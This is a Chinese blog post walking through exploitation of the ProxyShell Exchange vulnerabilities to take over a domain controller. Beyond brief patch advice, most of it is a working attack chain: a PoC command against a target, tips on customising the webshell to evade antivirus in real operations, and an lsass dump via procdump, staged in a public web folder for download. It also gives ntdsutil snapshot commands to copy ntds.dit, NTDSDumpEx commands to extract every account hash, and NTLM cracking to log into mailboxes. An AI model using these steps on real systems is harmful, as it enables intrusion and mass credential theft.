专栏首页小生观察室利用ProxyShell漏洞获取域控所有Hash
原创

利用ProxyShell漏洞获取域控所有Hash

ProxyShell简介

ProxyShell 由三个漏洞组成:

CVE-2021-34473:可导致 ACL 绕过的预认证路径混淆漏洞

CVE-2021-34523:在 Exchange PowerShell 后台的提权漏洞

CVE-2021-31207:可导致 RCE 的认证后任意文件写漏洞

未认证攻击者可利用 ProxyShell 漏洞通过被暴露的端口443在微软 Exchange Server 上执行任意命令。

与3月份微软修复的Proxylogon漏洞相比,ProxyShell不需要知道目标管理员邮箱即可利用,危害性更高。

影响范围

Microsoft Exchange Server 2010

Microsoft Exchange Server 2013

Microsoft Exchange Server 2016

Microsoft Exchange Server 2019

处置建议

当前微软官方已发布以上漏洞受影响版本的安全补丁,强烈建议受影响的用户尽快安装安全补丁进行防护。

建议受影响用户通过以下链接进行手动更新:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207

测试过程

测试环境

本地搭建的测试环境:

  • Microsoft Windows Server 2016 Datacenter
  • Exchange Server 2016 CU15 具体版本号可在owa页面查看源代码,在图标ico的链接处可以看到内部版本号。

根据微软官网Exchange Server内部版本号也可以进行对应

https://docs.microsoft.com/zh-cn/Exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019

外部打点

访问目标并确认服务无异常

通过POC获取权限

https://github.com/dmaasland/proxyshell-poc

用法

python3.8 proxyshell_rce.py -u https://小生观察室 -e administrator@小生观察室

该POC默认自带的马容易被查杀,在实战中建议对马内容进行自定义,我这里是进行修改后执行并获得shell

如需替换可利用ProxyShell_Payload对Conten里面的内容进行替换

利用工具:https://github.com/Ridter/proxyshell_payload

坑点:
实战中遇到很多Exchange的环境虽然是system权限,但依然无法执行命令,会出现拒绝访问等情况。一般出现这样的情况是被限制执行命令或者杀软导致,可以尝试BOF进行绕过【下一篇再详细说明】

该漏洞虽然不需要管理员邮箱,但是在实战中建议还是以Exchange Administrative Group中的邮箱用户为主,但很多时候无法找到该组里面对应的邮箱地址,为此需要用到自动获取对应邮箱信息的脚本,可以在公众号回复ProxyShell获取邮箱进行获取。

获取域控权限

进一步进行信息收集

通过对比进程发现存在杀软

查询域控制器

发现并没有返回常见的IPV4地址

这里利用到一个小技巧,可以通过nslookup直接寻找域控制器的地址

nslookup -type=SRV _ldap._tcp

经过对比IP地址发现当前exchange服务器与域控机器为同一台。

这里因为本地测试,所以环境全部搭建在一起,实战中也会遇到这样的情况,但也有出现不同的机器进行分别管理

获取域控hash

既然已经确定了机器位置就尝试去获取Hash,我这里为了方便用的是mimikatz+procdump的组合

将procdump上传到目标机器并执行

lsass.dmp文件打包并通过web的方式下载到本地

makecab C:\inetpub\wwwroot\aspnet_client\lsass.dmp C:\inetpub\wwwroot\aspnet_client\lsass.zip

将下载的lsass.zip文件解压并存放在mimikatz同级目录下,并通过mimikatz获取域控管理员hash信息

获取到域管信息

对于这步如果感觉相对比较麻烦,可以直接使用pwdump8

说明文档

https://www.openwall.com/passwords/windows-pwdump

下载地址

https://download.openwall.net/pub/projects/john/contrib/pwdump/pwdump8-8.2.zip

获取域控内所有hash

先导出ntds.dit中的内容【在域控服务器上操作】

文件路径c:\windows\ntds\ntds.dit

  • 创建快照
ntdsutil snapshot "activate instance ntds" create quit quit

  • 挂载快照
ntdsutil snapshot "mount {8b40c128-b348-4443-8197-fac604449900}" quit quit

  • 复制ntds.dit文件
copy C:\$SNAP_202109032304_VOLUMEC$\windows\NTDS\ntds.dit ntds.dit

  • 卸载快照
ntdsutil snapshot "unmount {8b40c128-b348-4443-8197-fac604449900}" quit quit

  • 删除快照
ntdsutil snapshot "delete {8b40c128-b348-4443-8197-fac604449900}" quit quit

最后利用NTDSDumpEx工具进行内容提取,将ntds.ditNTDSDumpEx放在目前机器同一个文件夹下执行

https://github.com/zcgonvh/NTDSDumpEx/releases

如果在能获取system.hiv文件的情况下,就执行以下步骤

NTDSDumpEx.exe -d ntds.dit -s system.hiv -o xiaoshengguanchashi.txt -h -m -p

如果不能获取system.hiv文件的情况下,执行如下步骤

  • 获取当前系统的SYSKEY
NTDSDumpEx.exe -r

  • 利用SYSKEY获取hash信息
NTDSDumpEx.exe -d ntds.dit -k 1026DD36333AEE8B3E593A5502A7967C -o xiaoshengguanchashi.txt -h -m -p

将生成的xiaoshengguanchashi.txt下载到本地打开即可看到所有的hash信息

登录exchang邮箱

将NTML进行解密即可登录

原创声明,本文系作者授权云+社区发表,未经许可,不得转载。

如有侵权,请联系 yunjia_community@tencent.com 删除。

关注作者,阅读全部精彩内容

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Exchange EWS接口的利用

    最近出来了几个Exchange preauth的漏洞,有Proxylogon、Proxyshell。简单看了下,本质都是SSRF,然后通过SSRF调用一些需要授...

    Jumbo
  • 无需免杀获取域控hash小技巧

    对mimikatz进行免杀后抓取出网机器中的明文及Hash信息,恰好域管曾登录过这台机器,利用抓取到的域管信息去连接域控机器。

    小生观察室
  • 新型勒索软件LockFile活跃,正积极攻击Microsoft Exchange

    近期,安全研究人员发现了一种针对Microsoft Exchange服务器的恶意软件,而且这款恶意软件甚至还可以执行Windows域加密。这款恶意软件名为Loc...

    FB客服
  • Exchange ProxyShell 远程代码执行漏洞复现

    今年的Blackhat演讲中,Orange Tsai对其在上一阶段对Microsoft Exchange Server进行的安全研究进行了分享,除了前一段时间已...

    Timeline Sec
  • Windows NetLogon权限提升漏洞(CVE-2019-1424) 复现

    2020年08月11日,微软MSRC官方发布了NetLogon特权提升漏洞的安全通告,该漏洞编号为 CVE-2020-1472,漏洞等级:严重, CVSS 评分...

    pensar
  • CVE-2020-1472漏洞实战 深度剖析

    CVE-2020-1472是继MS17010之后一个比较好用的内网提权漏洞,影响Windows Server 2008R 2至Windows Server 20...

    Ms08067安全实验室
  • CVE-2020-1472复现指北

    2020年8月11号,微软修复了Netlogon 特权提升漏洞,当攻击者使用 Netlogon 远程协议 (MS-NRPC) 建立与域控制器连接的易受攻击的 N...

    用户2202688
  • 微软NetLogon特权提升漏洞复现(CVE-2020-1472)

    2020年08月12日, 微软官方发布了 NetLogon 特权提升漏洞 的风险通告。攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通...

    Bypass
  • [干货基础]域渗透学习

    Kerberos是一种由MIT提出的一种计算机网络授权协议,旨在通过使用加密技术为客户端/服务端应用程序提供强大的认证服务。域内访问其他应用应遵循服务Kerbe...

    天钧
  • CVE-2020-1472复现打域控

    Netlogon使用的AES认证算法中的vi向量默认为0,导致攻击者可以绕过认证,同时其设置域控密码的远程接口也使用了该函数,导致可以将域控中保存在AD中的管理...

    轩辕小子
  • NetLogon 域内提权漏洞(CVE-2020-1472)复现过程

    CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞,攻击者通过NetLogon,建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访...

    渗透攻击红队
  • ZeroLogon(CVE-2020-1472) 分析与狩猎

    2020年9月11日,安全公司Secura发布了公告,披露了Microsoft在2020年8月修补的漏洞细节(CVE-2020-1472)。该漏洞也称为...

    tinyfisher
  • Kerberos Bronze Bit攻击(CVE-2020-17049)

    Kerberos Bronze Bit攻击(CVE-2020-17049)是国外netspi安全研究员Jake Karnes发现的漏洞

    黑白天安全
  • 如何通过WIFI渗透企业内网?

    介绍 黑盒渗透测试意味着白帽子对目标网络一无所知。模拟黑客攻击网络,并获取敏感信息。进一步,探索内网,识别内网中的漏洞,通过漏洞访问网络里的重要资源。 目的 在...

    FB客服
  • 记一次异常艰难的域靶场渗透

    资源连接: 链接:https://pan.baidu.com/s/16W3APIySbxXiseJ57RPScw 提取码:xcnd

    公众号爱国小白帽
  • CVE-2020-1472

    NetLogon组件 是 Windows 上一项重要的功能组件,用于用户和机器在域内网络上的认证,以及复制数据库以进行域控备份,同时还用于维护域成员与域之间、域...

    Khan安全团队
  • CVE-2020-1472漏洞分析

    NetLogon 远程协议是一种在 Windows 域控上使用的 RPC 接口,被用于各种与用户和机器认证相关的任务。最常用于让用户使用 NTLM 协议登录服务...

    FB客服
  • 利用 dcsync 获取域内所有用户哈希值

    大家好,这里是 渗透攻击红队 的第 34 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更

    渗透攻击红队
  • IoT安全之殇:小心你的摄像头

    “据媒体报道,杭州的胡女士发现她家的摄像头未经操作,自己在动。她登录手机客户端,发现只绑定了她一个用户的摄像头,竟有两个用户同时在线观看。” 这是生活中真实的案...

    FB客服

扫码关注云+社区

领取腾讯云代金券